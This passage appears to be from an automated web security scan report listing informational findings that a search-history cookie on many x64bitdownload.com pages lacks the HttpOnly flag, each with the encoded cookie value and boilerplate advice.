last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.60. http://www.x64bitdownload.com/64-bit-podcast-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.61. http://www.x64bitdownload.com/64-bit-posts-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-posts-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.62. http://www.x64bitdownload.com/64-bit-rar-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.63. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.64. http://www.x64bitdownload.com/64-bit-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.65. http://www.x64bitdownload.com/64-bit-reading-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.66. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.67. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.68. http://www.x64bitdownload.com/64-bit-rss-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.69. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.70. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.71. http://www.x64bitdownload.com/64-bit-search-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.72. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.73. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.74. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.75. http://www.x64bitdownload.com/64-bit-topic-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-topic-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.76. http://www.x64bitdownload.com/64-bit-troll-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.77. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-killer-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22troll-killer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22troll+killer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.78. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-trollkiller-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.79. http://www.x64bitdownload.com/64-bit-use-next-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.80. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.81. http://www.x64bitdownload.com/64-bit-usenet-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.82. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.83. http://www.x64bitdownload.com/64-bit-usenext-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.84. http://www.x64bitdownload.com/64-bit-video-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.85. http://www.x64bitdownload.com/64-bit-xpat-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.86. http://www.x64bitdownload.com/64-bit-yenc-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.87. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.88. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.89. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.90. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.91. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.92. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.93. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.94. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.95. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.96. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.97. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.98. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.99. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
